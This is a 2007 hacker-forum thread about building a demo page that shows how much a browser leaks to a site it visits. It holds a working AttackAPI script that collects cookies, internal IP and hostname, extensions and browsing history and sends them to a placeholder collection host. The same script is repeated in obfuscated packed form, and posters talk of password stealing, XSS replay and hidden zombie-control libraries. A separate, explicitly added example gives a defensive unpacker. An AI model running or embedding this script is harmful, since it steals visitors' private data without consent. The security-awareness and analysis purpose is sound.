Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 
Black Dragon Project. aka: what-do-we-know-about-you project
Posted by: jungsonn
Date: March 11, 2007 07:48PM

I've been walking around with this idea quite some time now, and want your input on it.


We've seen a lot of cool hacks by many talented hackers, security researchers, and programmers here on the board and elsewhere. But those are all fragmented pieces, doing things on their own, and aren't that convincing when I show some of them to my clients; they don't get excited about 3 alertboxes.

So, I thought about making a full webpage with all exploits, info disclosure, IP detection, intranet detection, tor detection, browser sniffer, IP/network sniffing, CSS history sniffing, javascript history sniffing, all the works into one page, to find out completely what we can find if a visitor visits this one page only.

I think if you combine all this stuff it would be simply mind blowing if you see the results printing on your screen.

Anyway, love to hear what you guys think about this, or if you wanna help/contribute.



Edited 1 time(s). Last edit at 03/12/2007 07:34AM by jungsonn.

Re: What-do-we-know-about-you Project.
Posted by: Jib
Date: March 11, 2007 09:44PM

Sounds like fun! If I didn't have a few things on my plate currently I'd be interested in participating. Perhaps if the project persists longer than a month I could add something.

Good luck
-Jib

[No sooner does man discover intelligence than he tries to involve it in his own stupidity.]
[Jaques Cousteau]

Re: What-do-we-know-about-you Project.
Posted by: thrill
Date: March 12, 2007 12:57AM

@jungsonn

I'll give you a scenario and then you can tell me if it's a good idea:

A boss/wife/enemy walks by your unlocked computer and launches a browser. They point it to this page you have created, and it gives them a world of information. You get fired, your wife files for divorce, and your enemy has learned your browsing habits. Now, let's say that 'accidentally' you had actually browsed a page that actually involved and/or included some extremely illegal stuff, such as bomb making methods, credit card and other personal information on millions of people, or maybe a quick browse of a kiddie porn site. Suddenly the FBI is called on you and you have absolutely no idea how anyone learned this.

But wait, eventually during your hearings it is revealed that this 'mostly erroneous' information was gathered by someone visiting www.jungsonnstudios.com, and it is revealed that what the website detected was caused by some form of spyware running on that system.

That is a huge liability. Not sure how the laws work where you live, but I am almost sure you will never find a site of that sort in the U.S.

However, this does not mean that I think it's a bad idea.. as a matter of fact I think it's a great idea, just not one the public at large is ready for.. you could make it available to your forum users, and only through your forums..

Just my .02 cents worth..

--thrill

Re: What-do-we-know-about-you Project.
Date: March 12, 2007 02:36AM

I agree with the above page, but I also believe it will cause a lot of lagging on older computers.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Re: What-do-we-know-about-you Project.
Posted by: jungsonn
Date: March 12, 2007 07:00AM

I'm quite sure what that meant, but it really is only a page where all things come together in one giant disclosure of what we can find out while surfing this page. Of course there will be a landing page (with proper disclaimers) first, where people can only access the page through login credentials presented on the landing page, and so they can browse further :)

I kinda see it as a sort of wiki but then 1 to 5 pages built and maintained by us.

If anyone is interested, I set up an FTP account to http://blackdragon.jungsonnstudios.com/ where we can host the project. If you wanna join, please PM me and I'll give you the proper FTP login credentials.



Edited 2 time(s). Last edit at 03/12/2007 07:19AM by jungsonn.

Re: What-do-we-know-about-you Project.
Posted by: SW
Date: March 12, 2007 09:05AM

thrill Wrote:
-------------------------------------------------------
> @jungsonn
>
> I'll give you a scenario and then you can tell me
> if it's a good idea:
>
> A boss/wife/enemy walks by your unlocked computer
> and launches a browser. They point it to this page
> you have created, and it gives them a world of
> information. You get fired, your wife files for
> divorce, and your enemy has learned your browsing
> habits. Now, let's say that 'accidentally' you
> had actually browsed a page that actually involved
> and/or included some extremely illegal stuff, such
> as bomb making methods, credit card and other
> personal information on millions of people, or
> maybe a quick browse of a kiddie porn site.
> Suddenly the FBI is called on you and you have
> absolutely no idea how anyone learned this.
>
> But wait, eventually during your hearings it is
> revealed that this 'mostly erroneous' information
> was gathered by someone visiting
> www.jungsonnstudios.com, and it is revealed that
> what the website detected was caused by some form
> of spyware running on that system.
>
> That is a huge liability. Not sure how the laws
> work where you live, but I am almost sure you will
> never find a site of that sort in the U.S.
>
> However, this does not mean that I think it's a
> bad idea.. as a matter of fact I think it's a
> great idea, just not one the public at large is
> ready for.. you could make it available to your
> forum users, and only through your forums..
>
> Just my .02 cents worth..
>
> --thrill

lol Who cares? Lock your PC when you aren't around?

I don't see how it is against any laws to create a page that displays as much info as it can get about you. Even if it logged the information and sold it, it shouldn't be illegal.

Re: Black Dragon Project. aka: what-do-we-know-about-you project
Posted by: Rich
Date: March 12, 2007 10:24AM

This sounds like a very worthwhile project to me.

As a corporate security bod, one of my seemingly eternal frustrations is trying to get the managerial types in my company to sit up and take notice of security problems as they occasionally arise on our website, for example. Now, I can sit there and type into a web form what looks to them like a lot of gobbledegook and, hey presto, an alert box with "XSS" might pop up on the screen. But to them this is utterly unimpressive; they just don't get it, and I suppose there's really no reason why they should. So, I attempt to explain to them what's going on and, slowly but surely, they slip into the inevitable coma that results when one of those techies from the basement attempts to explain something to them :)) OK, so I have bad presentation skills!

However, a one-page, dramatic demonstration of the type you describe should certainly impress them.

Re: Black Dragon Project. aka: what-do-we-know-about-you project
Posted by: jungsonn
Date: March 12, 2007 10:33AM

Yeah I thought also, another great thing about it is to show how dangerous JavaScript can potentially be.

Now the thing is to set it up, and in which way. In this I'd really like to hear from all you guys.

I've been thinking about the simple things first, like every info from a surfer: IP, natted IP, referer info, country, Firefox extension detection, browser fingerprint, cache history, phish example based on cache history.

With the cache history I think it would be awesome to match against a huge list of websites, and after that the more complex ones, like full-blown XSS, CSRFs, DNS pinning, Tor detection, Firefox password stealing, uploading their Boot.ini, you know, all the stuff found.

Re: Black Dragon Project. aka: what-do-we-know-about-you project
Posted by: rsnake
Date: March 12, 2007 05:19PM

Heh... I've been working on a similar idea for a while now, but like you I haven't had much time to follow through. Very cool project and I probably have dozens of things to add. The most interesting concept for me is making it something portable though. And not requiring anything more than a <SCRIPT SRC= on a page somewhere. That's sort of what I was getting at with this:

http://ha.ckers.org/weird/env.html

- RSnake
Gotta love it. http://ha.ckers.org

Re: Black Dragon Project. aka: what-do-we-know-about-you project
Posted by: jungsonn
Date: March 13, 2007 07:53AM

Yep, I've browsed through your /weird/ folder to look for interesting things to add. It probably will be an everlasting project.

But if anyone wants to contribute stuff, you can post links, snippets, stuff, or PM/mail me for FTP access if you want to set things up yourselves. I'm browsing through all websec blogs to find stuff but I can miss things.

Re: Black Dragon Project. aka: what-do-we-know-about-you project
Posted by: jungsonn
Date: March 13, 2007 08:23AM

@RSnake, yeah that would be a cool option also, make it a portable one which you can load onto a flash stick and sorts.

I really think that while in progress there should be different versions of it like you said, a portable one and a fixed one. I guess it's too much to scan all things at once, so maybe a few other versions of that as well. I was planning to detect all router images (kinda tough job btw) but that involves a huge scan, which might be best to launch on separate pages or with a button.

anyway much ideas :)

Re: Black Dragon Project. aka: what-do-we-know-about-you project
Posted by: WhiteAcid
Date: March 13, 2007 08:30AM

People should be able to use this in offline mode when they are giving presentations and don't have Internet access. Even though some of the functionality is missing.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Re: Black Dragon Project. aka: what-do-we-know-about-you project
Date: March 18, 2007 02:07PM

I have a little VBScript that you could put in there.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Re: Black Dragon Project. aka: what-do-we-know-about-you project
Posted by: jungsonn
Date: March 19, 2007 09:03AM

Mkay, can you send them to me? Or have a link? The following week I'll be working on it.

Re: Black Dragon Project. aka: what-do-we-know-about-you project
Date: March 19, 2007 04:03PM

I posted my VBScript proof of concept, which you can view here: http://sla.ckers.org/forum/read.php?2,8517


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Re: Black Dragon Project. aka: what-do-we-know-about-you project
Posted by: psifertex
Date: March 20, 2007 07:38PM

Jungsonn: I did something along those lines this morning for a presentation using BackFrame and AttackAPI. Not quite the same as in showing all the information leakage, but it was a quick and easy way for me to show folks how powerful javascript was via an interactive control mechanism. AttackAPI would make a great starting library for what you're talking about. It already has a ridiculous amount of useful functions built into it; it'd be easy to add some demo commands to run specific subsets, or add new functions.

One hack to it might be to actually create a server-side script that would serve up a modified AttackAPI pre-populated with particular variables set from the environment variables, like RSnake's env.js.

If anybody wants to see the presentation (didn't go nearly as well as I'd hoped, and I think the audio is going to be terrible in the video though I haven't imported it from the camera yet but oh well), it'll be up eventually at http://wantingseed.com/sprout/presentations

Re: Black Dragon Project. aka: what-do-we-know-about-you project
Posted by: jungsonn
Date: March 21, 2007 12:53AM

Cool stuff, yeh I got PDP's attack api and been browsing it a couple of times. There will be more if my time permits it. But like you said, it's nice to show all things in the right context with a lot of proof.

Re: Black Dragon Project. aka: what-do-we-know-about-you project
Date: March 21, 2007 06:39AM

jungsonn, this is how you do the enumeration with AttackAPI,

// Values AttackAPI returns synchronously; the three arrays are filled by the scans below.
var data = {
    agent: $A.getAgent(),
    platform: $A.getPlatform(),
    cookies: $A.buildQuery($A.getCookies()),
    plugins: $A.getPlugins().join(','),
    ip: $A.getInternalIP(),
    hostname: $A.getInternalHostname(),
    extensions: [],
    states: [],
    history: []
};

// Number of asynchronous scans that have finished (three are started).
var completed = 0;

$A.scanExtensions({
    onfound: function (signature) {
        data.extensions.push(signature.name);
    },
    oncomplete: function () {
        completed += 1;
    }
});

$A.scanStates({
    onfound: function (signature) {
        data.states.push(signature.name);
    },
    oncomplete: function () {
        completed += 1;
    }
});

$A.scanHistory({
    onfound: function (url) {
        data.history.push(url);
    },
    oncomplete: function () {
        completed += 1;
    }
});

// Poll once a second; send the results only after all three scans have completed.
var tmr = window.setInterval(function () {
    if (completed < 3)
        return;

    data.extensions = data.extensions.join(',');
    data.states = data.states.join(',');
    data.history = data.history.join(',');

    $A.transport({url: 'http://somehost/collect', query: data});
    window.clearInterval(tmr);
}, 1000);


btw psifertex,
check out the new ZombieMap application. It works with Carnaval for now but it is capable of working with other channel instances.

http://www.gnucitizen.org/zombiemap

Re: Black Dragon Project. aka: what-do-we-know-about-you project
Date: March 21, 2007 06:40AM

this is the packed version

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('d 2={G:$A.J(),n:$A.o(),I:$A.H($A.q()),r:$A.E().a(\',\'),D:$A.C(),B:$A.z(),7:[],8:[],9:[]};d 5=0;$A.x({f:4(6){2.7.e(6.g)},b:4(){5+=1}});$A.y({f:4(6){2.8.e(6.g)},b:4(){5+=1}});$A.j({f:4(c){2.9.e(c)},b:4(){5+=1}});d h=i.m(4(){p(5<3)u;2.7=2.7.a(\',\');2.8=2.8.a(\',\');2.9=2.9.a(\',\');$A.l({c:\'s://t/w\',k:2});i.F(h)},v);',46,46,'||data||function|completed|signature|extensions|states|history|join|oncomplete|url|var|push|onfound|name|tmr|window|scanHistory|query|transport|setInterval|platform|getPlatform|if|getCookies|plugins|http|somehost|return|1000|collect|scanExtensions|scanStates|getInternalHostname||hostname|getInternalIP|ip|getPlugins|clearInterval|agent|buildQuery|cookies|getAgent'.split('|'),0,{}))
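
The packed post above uses the `eval(function(p,a,c,k,e,d){...})` packer format. As an added example (not part of the original thread and not AttackAPI code), this is one way a defender reviewing such a script can recover the readable source and its keyword table without ever executing it; the function names and the sample input are constructed for illustration.

```javascript
// Added example: static unpacker for "eval(function(p,a,c,k,e,d)" packed scripts.
// It never calls eval or Function; it only rewrites strings.
const DIGITS = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';

// Matches the argument list that follows the decoder body:
//   }('payload',radix,count,'kw0|kw1|...'.split('|')
const PACKED_ARGS =
  /\}\('((?:[^'\\]|\\.)*)',(\d+),(\d+),'((?:[^'\\]|\\.)*)'\.split\('\|'\)/;

function isPacked(src) {
  return /eval\(function\(p,a,c,k,e,[dr]\)/.test(src) && PACKED_ARGS.test(src);
}

// Undo the single-quoted string escaping the packer applied to its arguments.
function unescapeLiteral(s) {
  return s.replace(/\\(.)/g, (m, ch) => (ch === 'n' ? '\n' : ch));
}

// Turn a token such as "1a" back into its keyword index in the given radix.
// Returns -1 when the token contains a character outside that radix.
function tokenToIndex(token, radix) {
  let n = 0;
  for (const ch of token) {
    const v = DIGITS.indexOf(ch);
    if (v < 0 || v >= radix) return -1;
    n = n * radix + v;
  }
  return n;
}

function unpack(src) {
  const m = PACKED_ARGS.exec(src);
  if (!m) return null;
  const payload = unescapeLiteral(m[1]);
  const radix = Number(m[2]);
  const keywords = unescapeLiteral(m[4]).split('|');
  // An empty keyword means the token stands for itself (k[c] || e(c)).
  const code = payload.replace(/\b\w+\b/g, (token) => {
    const i = tokenToIndex(token, radix);
    return i >= 0 && keywords[i] ? keywords[i] : token;
  });
  return { code, keywords: keywords.filter(Boolean) };
}

// Constructed sample in the packer's output format (decoder body elided).
const SAMPLE = String.raw`eval(function(p,a,c,k,e,d){/* decoder */}` +
  String.raw`('2 3=\'4\';0(3,1)',62,5,'print||var|msg|ok'.split('|'),0,{}))`;

if (isPacked(SAMPLE)) console.log(unpack(SAMPLE).code);
```

For triage, the keyword table is often enough on its own: in the packed post above it already lists the AttackAPI method names and the pieces of the collection URL in plain text.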

Re: Black Dragon Project. aka: what-do-we-know-about-you project
Posted by: nEUrOO
Date: March 21, 2007 08:21AM

Something that may be cool and impressive to show to people that don't really know web sec is playing with fired JS events.
You need a persistent XSS in the pages (seems not realistic but well, it's for demo) and then, you can launch your events with timers to navigate on that site...

nEUrOO -- http://rgaucher.info -- http://twitter.com/rgaucher

Re: Black Dragon Project. aka: what-do-we-know-about-you project
Date: March 21, 2007 09:18AM

oooh ok, yes I see what you mean. but you can do the same thing with the new AttackAPI without the need to fire events. Actually you can browse pages from your side that will result into the other side (the zombie). But I get your point. Sort of a replay attack :). Actually, this is a good idea.

There are several frameworks out there that allow you to record the actions you do on the site. After you finish recording, the application generates a simple JavaScript file. Now you can include this file as part of your XSS payload. This way you don't have to write the stuff yourself, you are merely replaying an attack.

Of course, this is a lot more complicated than it sounds.

Re: Black Dragon Project. aka: what-do-we-know-about-you project
Posted by: nEUrOO
Date: March 21, 2007 10:41AM

A simple version of this wouldn't be really complicated; doing this on a real website is the problem :)

nEUrOO -- http://rgaucher.info -- http://twitter.com/rgaucher

Re: Black Dragon Project. aka: what-do-we-know-about-you project
Posted by: jungsonn
Date: March 21, 2007 04:46PM

I don't see the problem with persistent XSS on a subdomain of my site. That's exactly what I was planning. Maybe also a few forms to fiddle around. A lot of stuff to fire events and real XSS. Maybe not on the same page, but another page. I don't know yet.

But keep the ideas rolling in though! :)

Re: Black Dragon Project. aka: what-do-we-know-about-you project
Posted by: nEUrOO
Date: March 21, 2007 09:29PM

Oh, I meant that it is tough to find a real website where you can have a persistent XSS on multiple pages where you can really play with fired events for navigation etc. :)

nEUrOO -- http://rgaucher.info -- http://twitter.com/rgaucher

Re: Black Dragon Project. aka: what-do-we-know-about-you project
Posted by: psifertex
Date: March 22, 2007 09:00PM

Yeah, pdp, yeah, I saw that. Great stuff. I'm tempted to start including hidden attackapi libraries on some of the websites I've got and monitoring them via the zombiemap. Could be fun. Could be dangerous too since it allows someone to do anything they want to my websites where I put them. ;-)

Or I suppose I could run my own copy of the zombie map somewhere else instead of using Carnaval.
